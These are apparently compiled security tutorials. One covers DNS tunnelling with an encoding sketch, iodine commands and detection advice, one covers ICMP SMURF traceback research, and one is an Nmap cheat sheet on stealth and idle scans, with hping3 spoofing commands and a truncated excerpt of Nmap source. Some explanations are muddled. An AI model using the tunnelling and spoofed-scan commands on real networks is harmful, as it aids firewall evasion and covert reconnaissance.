You all know what DNS is, so I won't spend much time on the basics. Our Internet world exists because of DNS, and exploiting DNS can take the Internet down for a day or a month, or in a particular region. One of the widely reported threats of 2012 was Operation Global Blackout, in which the attacker 'Anonymous' threatened to take down the complete global Internet. Computer security experts were worried and added extra layers of protection to their networks, particularly around DNS.

Have you ever hit a scenario where you could not access a website because a proxy blocked it? That is where DNS tunnelling comes in. With DNS tunnelling, a user can reach a website even though the proxy blocks it. Normally a proxy server sees all of the HTTP traffic, but no DNS traffic passes through it, so abusing the DNS channel lets us reach blocked websites as well. In a DNS tunnel, data is encapsulated within DNS queries and replies, using base32 and base64 encoding, and the DNS domain-name lookup system is used to send data bi-directionally. As long as you can do domain-name lookups on a network, you can tunnel any kind of data you want to a remote system, including Internet traffic. DNS record types (NULL/TXT/SRV/MX/CNAME) are used to encapsulate (downstream) IP traffic.

Consider a scenario in which Users A and B sit behind corporate firewall D: no websites are reachable from A or B, and only traffic on port 53 is allowed out through the firewall. Users A and B can still use the Internet by tunnelling it over DNS. The internal DNS server has caching capability, so when User A requests a website that is already in the cache, the request never goes to the iterative server. When User A initiates a new request, the internal DNS server finds no matching A record, so it forwards the query to an outside DNS server. The maximum length of a DNS name is 255 characters, with a limit of 63 characters per label, in the form label3.label2.label1.example.

To tunnel data over DNS, we need control of an external DNS server (in our case, the one on the outside), and we add two records to it. One is an NS record and the other is an A record. An NS (name server) record lets you delegate a subdomain of your domain to another name server. So if you own the domain laptop.com, you can add an NS record such as a.laptop.com NS computer.com, which means any DNS query for a.laptop.com and its subdomains will be delegated to computer.com. The A record simply maps a domain name to an IP address. To set up the DNS tunnel server we can install Iodine, a DNS tunnelling script, DNScapy, etc., and the end machine runs a matching DNS tunnelling client. Once the connection is up, we can run a SOCKS proxy over it for an uninterrupted connection.

DNS tunnelling is inefficient and slow. DNS traffic has very limited bandwidth, since the protocol was designed to carry only small requests and replies. However, botnets can use DNS tunnelling as a covert channel, and such covert channels are very hard to detect; they can be identified only by looking for C&C information inside the DNS traffic.
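To make the encapsulation step concrete, below is a minimal sketch (my own illustration, not code from iodine or any other tool mentioned here) of how a tunnelling client could base32-encode a chunk of upstream data and split it into DNS labels that respect the 63-character-per-label limit; tunnel.example.com stands in for a delegated zone you control.

#include <cstdint>
#include <iostream>
#include <string>

// RFC 4648 base32, without '=' padding since '=' is not valid in a DNS label.
// Base32 is preferred over base64 here because DNS names are case-insensitive.
static std::string base32_encode(const std::string &data) {
    static const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
    std::string out;
    uint32_t buffer = 0;
    int bits = 0;
    for (unsigned char c : data) {
        buffer = (buffer << 8) | c;
        bits += 8;
        while (bits >= 5) {
            out += alphabet[(buffer >> (bits - 5)) & 0x1f];
            bits -= 5;
        }
    }
    if (bits > 0)
        out += alphabet[(buffer << (5 - bits)) & 0x1f]; // flush remaining bits
    return out;
}

// Wrap one payload chunk as "<label>.<label>.tunnel.example.com".
static std::string make_query_name(const std::string &chunk) {
    std::string encoded = base32_encode(chunk);
    std::string name;
    for (size_t i = 0; i < encoded.size(); i += 63)
        name += encoded.substr(i, 63) + ".";
    return name + "tunnel.example.com";
}

int main() {
    // A real client would send this name as a TXT/NULL query, and would also
    // add sequence and session identifiers so the fake server on the outside
    // can reassemble the stream in order.
    std::cout << make_query_name("GET / HTTP/1.1") << "\n";
}

With iodine, for example, the server end is typically started along the lines of iodined -f 10.0.0.1 tunnel.example.com and the client with iodine -f tunnel.example.com, though the exact flags depend on the version you install.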
In most networks today, DNS is passed through largely as-is, while protocols like HTTP and FTP are routinely analysed and inspected. Botnets that use DNS tunnelling therefore give malware writers plenty of room to operate. The following are some DNS tunnelling tools:

DNS tunnelling tools
OzymanDNS
Dns2tcp
Iodine
Heyoka
DNSCat
NSTX
DNScapy
MagicTunnel, Element53, VPN-over-DNS (Android)

In DNS tunnelling, requests from the clients are fragmented and sent as separate DNS queries, and the reply traffic likewise has to be fragmented. DNS runs over UDP rather than TCP, so fragmentation and correct reassembly must be handled by the fake (tunnel) server. DNS tunnels are commonly used to carry out covert file transfers, C&C server traffic and web browsing. File transfer over DNS tends to use the channel aggressively, given the DNS protocol's encapsulation overhead for bulk data. C&C server traffic carries minimal traffic and shows fairly regular patterns. Web browsing through a DNS tunnel is a mixture of the two. Security engineers should write signatures promptly to detect such traffic. Two useful techniques for DNS tunnel detection are flow-based detection and character-based frequency analysis.

Detection
DNS tunnelling can be detected by monitoring the size of DNS request and reply queries; tunnelled traffic is likely to carry DNS names longer than 64 characters. Keeping IPS and IDS signatures up to date is another detection mechanism: rules should be configured to watch for a large number of DNS TXT records on a DNS server, and SIEM rules should trigger when the volume of DNS traffic from a particular source is unusually high. Another method is the split-horizon DNS concept, so that internal addresses are handled on a dedicated server; clients connect out to the Internet through a proxy server, and the proxy resolves external DNS for them. Some proxies can also inspect the DNS information. DNSTrap is a tool developed to detect DNS tunnelling using an artificial neural network (ANN). It trains on five attributes: the domain name, how many packets are sent to a particular domain, the average length of packets to that domain, the average number of distinct characters in the LLD, and the distance between LLDs. Next-generation firewalls such as Palo Alto and FireEye can also detect DNS tunnelling.
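As a rough illustration of the character-frequency idea above, the following sketch (my own, not taken from DNSTrap or any product) flags queried names whose first label has unusually high Shannon entropy; the 3.5-bits-per-character threshold is an arbitrary assumption for demonstration, and a real detector would baseline it against the site's own traffic.

#include <cmath>
#include <iostream>
#include <map>
#include <string>

// Encoded payloads (base32/base64) look far more "random" than ordinary
// hostnames, so their per-character entropy is noticeably higher.
static double shannon_entropy(const std::string &s) {
    std::map<char, int> freq;
    for (char c : s) freq[c]++;
    double h = 0.0;
    for (const auto &kv : freq) {
        double p = static_cast<double>(kv.second) / s.size();
        h -= p * std::log2(p);
    }
    return h;
}

int main() {
    // In practice these names would come from DNS logs or a packet capture.
    const std::string samples[] = {
        "www.google.com",
        "mjuxiltmpeqgc3tlmvwgs33oejqxgzlt.tunnel.example.com",
    };
    for (const auto &name : samples) {
        std::string first_label = name.substr(0, name.find('.'));
        double h = shannon_entropy(first_label);
        std::cout << name << "  entropy=" << h
                  << (h > 3.5 ? "  <-- possible tunnel" : "") << "\n";
    }
}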
References
http://psichron.za.net/downloads/dns_tunneling.txt
DNS Tunneling made easy [splitbrain.org]
http://arxiv.org/ftp/arxiv/papers/1004/1004.4358.pdf

Source

-
There are plenty of different ways to track the original source of a DoS attack, but those techniques are not efficient enough to trace a reflected ICMP attack, i.e. a SMURF attack. Here I am going to show you a new model for tracing back a reflective DoS attack carried out with ICMP packets. This method is very efficient because it works with only a handful of attack packets. To detect a direct ICMP attack, a large number of packets has to be examined; that is not the case here.

Introduction
In this digital era it is genuinely difficult to protect a network from DoS attacks; big brands have faced these attacks even with well-secured networks. It is the host's responsibility to send and receive packets between its network and the client, and it is the destination's responsibility to receive the packets sent by the source and verify their validity.

Attack Classification
There are two types of attacks:
Direct attacks
Indirect/reflective attacks

A direct attack is exactly what its name says: packets are sent directly to the victim. In a reflective attack, the packets are sent to an intermediate network and from there travel on to the victim. This intermediate network can be a custom proxy or a custom network. A SMURF attack is an example of a reflective attack: the attacker sends ICMP echo packets to a network, called an amplifier, with the source address spoofed to the victim's IP address. Every machine on the amplifier network then sends its reply to the victim machine, as illustrated in the figure below. The number of replies the victim receives depends on the number of machines connected to the amplifier network. This attack is easy to implement and hard to trace, because a single actor can attack a large enterprise using only very few machines or resources.

Now I am going to show you a new theoretical method to trace back the reflective ICMP flood attack. To trace reflective ICMP packets, we first have to understand the following terms.

1. Packet Marking
This is a very basic approach in which the router itself adds some information to the packet, allowing the source of a packet flow to be located. The router writes its IP address into the packet header of passing packets, and the victim reconstructs the attack path from the markings it receives; each marking is the address of a router lying between the attacker and the victim. The victim needs a very large number of packets in order to reconstruct a path, because each participating router needs multiple packets to transmit its own IP address.

Figure 1. Marking in the IP header

2. ICMP Traceback
In this approach, routers send out-of-band traceback details to the destination of the flow, which then reconstructs the attack path. Bellovin proposed the classic method, iTrace [15]: routers emit ICMP packets towards the destination carrying path information, so those packets contain details about the marking router. The victim collects these ICMP packets during the attack, extracts the traceback information, and reconstructs the attack path.
With the new method presented here, far fewer signalling packets need to be sent to the destination. The studies done up to now do not deal with reflective attacks at all; those methods handle only direct attacks.

Problems Faced During the Traceback
In packet logging, the hash value of a packet changes after reflection, so that traceback approach is not useful here. In packet marking, the identification field changes after any reflection; on top of that, a marking is received by the victim only after a successful reflection, so traceback does not help there either. In the traditional ICMP traceback method, the packets received by the victim contain only path information between the amplifier network and the victim, so no legitimate, real information about the attacker is present.

Tracing Back ICMP Attacks
ICMP echo packets are simply echo request-and-reply packets. This is a novel approach for tracing back ICMP packets, whether direct or reflected, using a new marking method in which the data field carries all of the traceback information. Researchers noticed that this part of the ICMP protocol's behaviour is symmetric: when a machine receives an ICMP echo request, it responds with exactly the data field contained in the request. So any modification made to the data field, whether on the request or the reply leg, arrives intact at the destination and is visible to both receiver and sender. Packets are therefore marked with the new technique explained below.

In an ICMP direct attack, the attacker floods the victim either with ICMP requests or with reply messages, and our marking is applied to every ICMP echo packet. With this methodology it does not matter whether the packet is direct or reflected: the marking router inserts its address into the data field of the ICMP message on the request as well as on the response. Because the data field remains unchanged, the victim ends up with traceback information covering the path through the intermediate amplifier network all the way back to the attacker.

Problem with this approach: a single packet may pass through 15 or more routers, and storing the markings of all of those routers requires a large amount of space, while the room available for traceback information is limited.

Solution: the researchers used a probabilistic technique to record the complete path, starting from the attacker and ending at the destination, in a proper flow. During an attack the victim collects various router IP addresses and must then reconstruct the attack path. To make that possible, each router copies the TTL field, together with its own IP address, into the data field; different bits of the TTL are used to differentiate echo requests from echo replies. The victim then uses all of these bits to reconstruct the attack path, as shown in the figure below.

Figure 2. New marking process of the data field
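To make the marking idea concrete, here is a speculative sketch of the per-router marking step; the record layout and the 50% marking probability are my own assumptions for illustration, since the paper's exact field format is not reproduced in this article.

#include <cstdint>
#include <cstdlib>
#include <vector>

// One traceback record appended to the ICMP echo data field.
struct MarkRecord {
    uint32_t router_ip; // IPv4 address of the marking router
    uint8_t  ttl;       // TTL seen at this router; sorting by TTL orders the path
    uint8_t  is_reply;  // spare bit distinguishing echo request from echo reply
};

// Executed by each router on the path for every ICMP echo packet it forwards.
// Marking probabilistically keeps the data field from overflowing when a
// packet crosses 15 or more routers.
void maybe_mark(std::vector<MarkRecord> &data_field, uint32_t my_ip,
                uint8_t ttl, bool reply, double p = 0.5) {
    if (static_cast<double>(std::rand()) / RAND_MAX < p)
        data_field.push_back({my_ip, ttl, reply ? uint8_t(1) : uint8_t(0)});
}

Because the data field survives reflection unchanged, the victim accumulates records from routers on both the attacker-to-amplifier and amplifier-to-victim legs, and sorting them by TTL reconstructs the full path.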
Practical Implementation
Up to now I have talked about the theoretical technique. In practice, the researchers propose implementing it in a virtual environment as shown in the figure below, using five routers, three reflectors, and one victim and one attacker machine. A packet travels from the attacker to the victim, with the necessary condition that it passes through all the routers implemented in the virtual lab.

Figure 3. Scenario for implementing the new marking technique

All machines run Linux, and the routers have packet forwarding enabled so that every ICMP echo request and reply packet gets marked. A SMURF attack is then launched, in which the attacker sends packets towards the victim; the packets pass through all the routers, and each router's responsibility is to mark every packet with its TTL and IP address. The receiver then collects all the packets, analyses them, and reconstructs the origin of the attack path. Thus we can trace back reflective ICMP attacks using very few packets.

Conclusion
Using this technique, one can trace back ICMP DoS attacks, both direct and reflective (the reflective variety being the SMURF attack).

Source
-
This is the second installment of our Nmap cheat sheet. Basically, we will discuss some advanced techniques for Nmap scanning and conduct a man-in-the-middle (MITM) style attack. Let's start our game now.

TCP SYN Scan
The SYN scan is the default and most popular scan option, for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections.
Command: nmap -sS target

TCP Connect Scan
The TCP connect scan is the default TCP scan type when a SYN scan is not an option, i.e. when the user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call.
Command: nmap -sT target

UDP Scans
While most popular services on the Internet run over TCP, UDP services are widely deployed; DNS, SNMP, and DHCP (registered ports 53, 161/162, and 67/68) are three of the most common. Because UDP scanning is generally slower and more difficult than TCP, some security auditors ignore these ports. That is a mistake: exploitable UDP services are quite common, and attackers certainly don't ignore the whole protocol.
Command: nmap -sU target
The --data-length option can be used to send a fixed-length random payload to every port or (if you specify a value of 0) to disable payloads. If an ICMP port unreachable error (type 3, code 3) is returned, the port is closed. Other ICMP unreachable errors (type 3; codes 1, 2, 9, 10, or 13) mark the port as filtered. Occasionally a service responds with a UDP packet, proving that the port is open. If no response is received after retransmissions, the port is classified as open|filtered.
Command: nmap -sU --data-length=value target

SCTP INIT Scan
SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of both and adding new features like multi-homing and multi-streaming. It is mostly used for SS7/SIGTRAN-related services but has the potential to be used for other applications as well. The SCTP INIT scan is the SCTP equivalent of a TCP SYN scan: it can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls, and like the SYN scan it is relatively unobtrusive and stealthy, since it never completes SCTP associations.
Command: nmap -sY target

TCP NULL, FIN, and Xmas Scans
NULL scan (-sN): does not set any bits (the TCP flag header is 0).
FIN scan (-sF): sets just the TCP FIN bit.
Xmas scan (-sX): sets the FIN, PSH, and URG flags, lighting up the packet like a Christmas tree.

TCP ACK Scan
This scan is different from the others discussed so far in that it never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful and which ports are filtered.
Command: nmap -sA target
The ACK scan probe packet has only the ACK flag set (unless you use --scanflags). When scanning unfiltered systems, open and closed ports both return a RST packet; Nmap then labels them unfiltered, meaning that they are reachable by the ACK packet.
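The state inference behind all of these scan types boils down to a small decision table. The sketch below is my own condensation of the rules described above, not Nmap code:

#include <iostream>
#include <string>

enum class Probe { Syn, NullFinXmas, Ack };
enum class Reply { SynAck, Rst, IcmpUnreach, None };

// Map a probe type and the raw response to the port state Nmap would report.
std::string classify(Probe p, Reply r) {
    switch (p) {
    case Probe::Syn: // -sS
        if (r == Reply::SynAck) return "open";
        if (r == Reply::Rst)    return "closed";
        return "filtered";
    case Probe::NullFinXmas: // -sN / -sF / -sX
        if (r == Reply::Rst)         return "closed";
        if (r == Reply::IcmpUnreach) return "filtered";
        return "open|filtered"; // silence is ambiguous for these probes
    case Probe::Ack: // -sA only maps firewall rules
        return (r == Reply::Rst) ? "unfiltered" : "filtered";
    }
    return "?";
}

int main() {
    std::cout << classify(Probe::Syn, Reply::SynAck) << "\n"       // open
              << classify(Probe::NullFinXmas, Reply::None) << "\n" // open|filtered
              << classify(Probe::Ack, Reply::Rst) << "\n";         // unfiltered
}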
TCP Window Scan
The window scan is exactly the same as the ACK scan, except that it exploits an implementation detail of certain systems to differentiate open ports from closed ones, rather than always printing unfiltered when a RST is returned.
Command: nmap -sW target

TCP Maimon Scan
The Maimon scan is named after its discoverer, Uriel Maimon, who described the technique in Phrack Magazine issue #49 (November 1996); Nmap, which included the technique, was released two issues later. It is exactly the same as the NULL, FIN, and Xmas scans, except that the probe is FIN/ACK.
Command: nmap -sM target

Custom TCP Scan Using the --scanflags Option
For advanced pentesting, a pentester will not use a generic TCP scan like ACK or FIN, because those may be blocked by IDS/IPS; instead they craft probes with the --scanflags option. This can also be used for firewall evasion. The --scanflags argument can be a numerical flag value such as 9 for PSH and FIN (the TCP flag bits are FIN=1, SYN=2, RST=4, PSH=8, ACK=16, URG=32, so PSH+FIN = 8+1 = 9), but using symbolic names is easier: just mash together any combination of URG, ACK, PSH, RST, SYN, and FIN. For example, --scanflags URGACKPSHRSTSYNFIN sets everything, though that is not very useful for scanning.
Command: nmap --scanflags <flags> target

SCTP COOKIE ECHO Scan
The SCTP COOKIE ECHO scan is a more advanced SCTP scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports, but send an ABORT if the port is closed. The advantage of this scan type is that it is not as obvious a port scan as an INIT scan; also, non-stateful firewall rulesets may block INIT chunks but not COOKIE ECHO chunks. A good IDS will still be able to detect SCTP COOKIE ECHO scans. The downside is that this scan cannot differentiate between open and filtered ports, leaving you with the state open|filtered in both cases.
Command: nmap -sZ target

TCP Idle Scan
This advanced scan method allows a truly blind TCP port scan of the target, meaning no packets are sent to the target from your real IP address. Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify, which is what makes it useful for the man-in-the-middle-style deception mentioned at the start.
Command: nmap -sI zombie target
The victim believes the zombie is the attacker machine when it actually is not; the attacker has fooled the victim. Here "zombie" means the trusted machine in the middle; it can be any machine that sits between attacker and victim. Since this is advanced pentesting, let's move ahead with the details of the idle scan.

History and Details
In 1998, security researcher Antirez (who also wrote the hping2 tool used in parts of this book) posted an ingenious new port scanning technique to the Bugtraq mailing list. He called it the "dumb scan". Attackers can actually scan a target without sending a single packet to the target from their own IP address! Instead, a clever side-channel attack allows the scan to be bounced off a dumb "zombie host". Intrusion detection system (IDS) reports will finger the innocent zombie as the attacker. Besides being extraordinarily stealthy, this scan type permits discovery of IP-based trust relationships between machines.

What Is the Actual Game?
An attacker does not need to be a TCP/IP expert to conduct this attack, though it is more advanced than the techniques discussed so far. The attack is built from the following observations.

One way to determine whether a TCP port is open is to send a SYN (session establishment) packet to it. The target machine responds with a SYN/ACK (session request acknowledgment) packet if the port is open, and a RST (reset) if the port is closed; this is the basis of the previously discussed SYN scan. A machine that receives an unsolicited SYN/ACK packet responds with a RST, while an unsolicited RST is ignored. Also, every IP packet on the Internet has a fragment identification number (the IP ID), and since many operating systems simply increment this number for each packet they send, probing the IP ID tells an attacker how many packets the host has sent since the last probe. By combining these traits, it is possible to scan a target network while forging your identity, so that it looks like an innocent zombie machine did the scanning.

Idle Scan Explained
To conduct this attack, the following steps may be followed:
1. Probe the zombie's IP ID and record it.
2. Forge a SYN packet "from" the zombie and send it to the desired port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented.
3. Probe the zombie's IP ID again. The target port state is determined by comparing this new IP ID with the one recorded in step 1.

How to Determine the Port State from the IP ID
From the IP ID value, the attacker learns whether the port is open, filtered, or closed. After the idle scan sequence above, the zombie's IP ID should have increased by either one or two. An increase of one indicates that the zombie sent no packets other than its reply to the attacker's probe; this lack of sent packets means the port is not open (the target must have sent the zombie either a RST packet, which was ignored, or nothing at all). An increase of two indicates that the zombie sent out one packet between the two probes; this extra packet usually means the port is open (the target presumably sent the zombie a SYN/ACK packet in response to the forged SYN, which induced a RST packet from the zombie). Increases larger than two usually signify a bad zombie host: it might not have predictable IP ID numbers, or might be engaged in communication unrelated to the idle scan. The figures below relate attacker, zombie, and victim, and show how the attack is conducted.

Idle Scan of an Open Port
Step 1: Probe the zombie's IP ID. The attacker sends a SYN/ACK to the zombie. The zombie is not expecting these packets, so it responds with a RST, disclosing its current IP ID (in this example, 31337).
Step 2: Forge a SYN packet from the zombie. The victim receives a SYN that appears to come from the zombie and answers the "zombie" with a SYN/ACK; the zombie replies to that unexpected SYN/ACK with a RST, incrementing its IP ID (to 31338).
Step 3: Probe the zombie's IP ID again. The zombie's RST now carries IP ID 31339, an increase of two since step 1, so we know the port is open.

Note: if the port is closed, the IP ID increases by only one. An increase of one therefore means the port may be closed or filtered. In the filtered case, the victim sends no response at all to the zombie for the attacker's forged SYN. In this situation the attacker learns that there may be an IDS/IPS with rules blocking certain scan attempts via zombie machines, and he would then use Nmap's decoy options to evade it; we will discuss that later.
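The inference rule above fits in a few lines. The following sketch (mine, not Nmap's) classifies the target port from the difference between the two zombie IP ID probes:

#include <cstdint>
#include <iostream>
#include <string>

// Classify a target port from the zombie's IP ID delta between steps 1 and 3.
// uint16_t arithmetic handles IP ID wraparound at 65535 for free.
std::string idle_scan_verdict(uint16_t ipid_before, uint16_t ipid_after) {
    uint16_t delta = ipid_after - ipid_before;
    if (delta == 2) return "open";            // zombie RST'd a SYN/ACK from the target
    if (delta == 1) return "closed|filtered"; // zombie only answered our probe
    return "bad zombie (not idle, or unpredictable IP ID)";
}

int main() {
    std::cout << idle_scan_verdict(31337, 31339) << "\n"; // "open", as in the example
}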
Step 1: Finding a Zombie Host for the Idle Scan
The first step in executing an IP ID idle scan is to find an appropriate zombie. It needs to assign IP IDs incrementally on a global basis (rather than per host it communicates with), and it should be idle (hence the scan name), since extraneous traffic will bump up its IP ID sequence and confuse the scan logic. A common approach is simply to execute an Nmap ping scan of some network. We can use Nmap's random IP selection mode (-iR), but that is likely to yield far-away zombies with substantial latency. Performing a port scan and OS identification (-O) on the zombie-candidate network, rather than just a ping scan, helps in selecting a good zombie: as long as verbose mode (-v) is enabled, OS detection will usually determine the IP ID sequence generation method and print a line such as "IP ID Sequence Generation: Incremental". If the type is given as Incremental or Broken little-endian incremental, the machine is a good zombie candidate.

Another approach to identifying zombie candidates is to run the ipidseq NSE script against a host. This script probes a host to classify its IP ID generation method, then prints the IP ID classification, much like OS detection does.
Command: nmap --script ipidseq [--script-args probeport=port] target
If the output reports Incremental, the host is a good candidate for a zombie.

Using hping
We can also use hping to discover a zombie; the hping method provides a lower-level view of how idle scanning is performed. In this example, the target host (target1) will be scanned using an idle host (target2), testing one open and one closed port to see how each scenario plays out. First, establish that the idle host is actually idle: send packets using hping and observe the IP ID numbers increase incrementally by one. If the ID numbers increase haphazardly, the host is not actually idle, or has an OS with no predictable IP ID.
hping3 -S target
Then send a spoofed SYN packet to the target host on a port you expect to be open:
hping3 --spoof zombie -S -p 22 target
(Note: I do not want to include the screenshot here. Although this is part of my research and this document is for educational purposes only, the owner of the website does not want it disclosed. If you have any doubt, you can contact me here or email me.)
As you can see, there is no response and it shows 100% packet loss. That means we have failed to find a zombie this way. We check the following step for confirmation, looking at the IP ID value for any increment:
hping3 -S target
No response, which indicates that the port is filtered.

Attack Using Nmap
See the image below: we attack the target machine using a zombie host.
Command: nmap -Pn -p- -sI zombie target
First we run an Nmap scan for ports. Based on that, we try port 22, which is already running; here we are unable to attack the target, as the port is already used for some other purpose. By default, Nmap forges its probes to the target from source port 80 of the zombie. You can choose a different port by appending a colon and port number to the zombie name (e.g. -sI zombie:113).
The chosen port must not be filtered from the attacker or the target; a SYN scan of the zombie should show the port in the open or closed state. The options used here:
-Pn prevents Nmap from sending the initial ping packets to the target machine.
-p- scans all 65535 ports.
-sI selects the idle scan and sends the spoofed packets.
The effect is that the target's IDS will think the packets are coming from the zombie machine, not from the attacker, so the analyst behind it will be misled.

Understanding Nmap Internally
As pentesters, we must understand the internal workings of Nmap's idle scan, so that we can craft the same thing in our own implementation; we could even write our own Python code to do the same job. To see the basic flow, or algorithm, of Nmap's idle scan, use Nmap's packet-trace option:
Command: nmap -sI zombie:113 -Pn -p20-80,110-180 -r --packet-trace -v target
-Pn is necessary for stealth; otherwise ping packets would be sent to the target from the attacker's real address. Version scanning would likewise expose the true address, which is why -sV is not specified. The -r option (which turns off port randomization) is only used to make this example easier to follow. As I said before, use a suitable zombie port for a successful attack.

The process of this attack: Nmap first tests the zombie's IP ID sequence generation by sending six SYN/ACK packets to it and analyzing the responses. In the packet-trace output, R denotes a reset (RST) packet, meaning the zombie is not usable through that port because the port is already used by other services. For more details, see the TCP Idle Scan (-sI) section of the Nmap manual. Given a vulnerable machine and a suitable zombie, the attack succeeds.

The source below is Nmap's idle scan implementation; it is built as part of Nmap rather than compiled as a standalone program. This is an extraordinary scan that allows completely blind scanning (e.g. no packets sent to the target from your own IP address) and can also be used to penetrate firewalls and scope out router ACLs.

#include "idle_scan.h"
#include "timing.h"
#include "osscan2.h"
#include "nmap.h"
#include "NmapOps.h"
#include "services.h"
#include "Target.h"
#include "utils.h"
#include "output.h"
#include "struct_ip.h"

extern NmapOps o;

struct idle_proxy_info {  /* gathers all state for the zombie (proxy) host */
  Target host;            /* contains name, IP, source IP, timing info, etc. */
  int seqclass;           /* IP ID sequence class (IPID_SEQ_* defined in nmap.h) */
  u16 latestid;           /* The most recent IP ID we have received from the proxy */
  u16 probe_port;         /* The port we use for probing IP ID infoz */
  u16 max_groupsz;        /* We won't test groups larger than this ... */
  u16 min_groupsz;        /* We won't allow the group size to fall below this
                             level. Affected by --min-parallelism */
  double current_groupsz; /* Current group size being used ... depends on
                             conditions ... won't be higher than max_groupsz */
  int senddelay;          /* Delay between sending pr0be SYN packets to target
                             (in microseconds) */
  int max_senddelay;      /* Maximum time we are allowed to wait between
                             sending pr0bes (when we send a bunch in a row.
                             In microseconds. */
  pcap_t *pd;             /* A Pcap descriptor which (starting in
                             initialize_idleproxy) listens for TCP packets from
                             the probe_port of the proxy box */
  int rawsd;              /* Socket descriptor for sending probe packets to the proxy */
  struct eth_nfo eth;     // For when we want to send probes via raw IP instead.
  struct eth_nfo *ethptr; // points to eth if filled out, otherwise NULL
};

/* Sends an IP ID probe to the proxy machine and returns the IP ID.
   This function handles retransmissions, and returns -1 if it fails. Proxy
   timing is adjusted, but proxy->latestid is NOT ADJUSTED -- you'll have to do
   that yourself. Probes_sent is set to the number of probe packets sent during
   execution */
static int ipid_proxy_probe(struct idle_proxy_info *proxy, int *probes_sent,
                            int *probes_rcvd) {
  struct timeval tv_end;
  int tries = 0;
  int trynum;
  int sent = 0, rcvd = 0;
  int maxtries = 3; /* The maximum number of tries before we give up */
  struct timeval tv_sent[3], rcvdtime;
  int ipid = -1;
  int to_usec;
  unsigned int bytes;
  int base_port;
  struct ip *ip;
  struct tcp_hdr *tcp;
  static u32 seq_base = 0;
  static u32 ack = 0;
  static int packet_send_count = 0; /* Total # of probes sent by this program --
                                       to ensure that our sequence # always changes */

  if (o.magic_port_set)
    base_port = o.magic_port;
  else
    base_port = o.magic_port + get_random_u8();

  if (seq_base == 0)
    seq_base = get_random_u32();
  if (!ack)
    ack = get_random_u32();

  do {
    gettimeofday(&tv_sent[tries], NULL);
    /* Time to send the pr0be! */
    send_tcp_raw(proxy->rawsd, proxy->ethptr,
                 proxy->host.v4sourceip(), proxy->host.v4hostip(),
                 o.ttl, false, o.ipoptions, o.ipoptionslen,
                 base_port + tries, proxy->probe_port,
                 seq_base + (packet_send_count++ * 500) + 1, ack, 0,
                 TH_SYN|TH_ACK, 0, 0, (u8 *) "\x02\x04\x05\xb4", 4, NULL, 0);
    sent++;
    tries++;

    /* Now it is time to wait for the response ... */
    to_usec = proxy->host.to.timeout;
    gettimeofday(&tv_end, NULL);
    while ((ipid == -1 || sent > rcvd) && to_usec > 0) {
      to_usec = proxy->host.to.timeout - TIMEVAL_SUBTRACT(tv_end, tv_sent[tries-1]);
      if (to_usec < 0)
        to_usec = 0; // Final no-block poll
      ip = (struct ip *) readipv4_pcap(proxy->pd, &bytes, to_usec, &rcvdtime, NULL, true);
      gettimeofday(&tv_end, NULL);
      if (ip) {
        if (bytes < (4 * ip->ip_hl) + 14U)
          continue;
        if (ip->ip_p == IPPROTO_TCP) {
          tcp = ((struct tcp_hdr *) (((char *) ip) + 4 * ip->ip_hl));
          if (ntohs(tcp->th_dport) < base_port ||
              ntohs(tcp->th_dport) - base_port >= tries ||
              ntohs(tcp->th_sport) != proxy->probe_port ||
              ((tcp->th_flags & TH_RST) == 0)) {
            if (ntohs(tcp->th_dport) > o.magic_port && ntohs(tcp->th_dport) < (o.magic_port + 260)) {
              if (o.debugging) {
                error("Received IP ID zombie probe response which probably came from an earlier prober instance ... increasing rttvar from %d to %d",
                      proxy->host.to.rttvar, (int) (proxy->host.to.rttvar * 1.2));
              }
              proxy->host.to.rttvar = (int) (proxy->host.to.rttvar * 1.2);
              rcvd++;
            } else if (o.debugging > 1) {
              error("Received unexpected response packet from %s during IP ID zombie probing:", inet_ntoa(ip->ip_src));
              readtcppacket((unsigned char *) ip, MIN(ntohs(ip->ip_len), bytes));
            }
            continue;
          }
          trynum = ntohs(tcp->th_dport) - base_port;
          rcvd++;
          ipid = ntohs(ip->ip_id);
          adjust_timeouts2(&(tv_sent[trynum]), &rcvdtime, &(proxy->host.to));
        }
      }
    }
  } while (ipid == -1 && tries < maxtries);

  if (probes_sent)
    *probes_sent = sent;
  if (probes_rcvd)
    *probes_rcvd = rcvd;
  return ipid;
}

/* Returns the number of increments between an early IP ID and a later one,
   assuming the given IP ID Sequencing class. Returns -1 if the distance cannot
   be determined */
static int ipid_distance(int seqclass, u16 startid, u16 endid) {
  if (seqclass == IPID_SEQ_INCR)
    return endid - startid;
  if (seqclass == IPID_SEQ_BROKEN_INCR) {
    /* Convert to network byte order */
    startid = htons(startid);
    endid = htons(endid);
    return endid - startid;
  }
  return -1;
}

static void initialize_proxy_struct(struct idle_proxy_info *proxy) {
  proxy->seqclass = proxy->latestid = proxy->probe_port = 0;
  proxy->max_groupsz = proxy->min_groupsz = 0;
  proxy->current_groupsz = 0;
  proxy->senddelay = 0;
  proxy->max_senddelay = 0;
  proxy->pd = NULL;
  proxy->rawsd = -1;
  proxy->ethptr = NULL;
}

/* takes a proxy name/IP, resolves it if necessary, tests it for IP ID
   suitability, and fills out an idle_proxy_info structure. If the proxy is
   determined to be unsuitable, the function whines and exits the program */
#define NUM_IPID_PROBES 6
static void initialize_idleproxy(struct idle_proxy_info *proxy, char *proxyName,
                                 const struct in_addr *first_target,
                                 const struct scan_lists *ports) {
  int probes_sent = 0, probes_returned = 0;
  int hardtimeout = 9000000; /* Generally don't wait more than 9 secs total */
  unsigned int bytes, to_usec;
  int timedout = 0;
  char *p, *q;
  char *endptr = NULL;
  int seq_response_num;
  int newipid;
  int i;
  char filter[512]; /* Libpcap filter string */
  char name[MAXHOSTNAMELEN + 1];
  struct sockaddr_storage ss;
  size_t sslen;
  u32 sequence_base;
  u32 ack = 0;
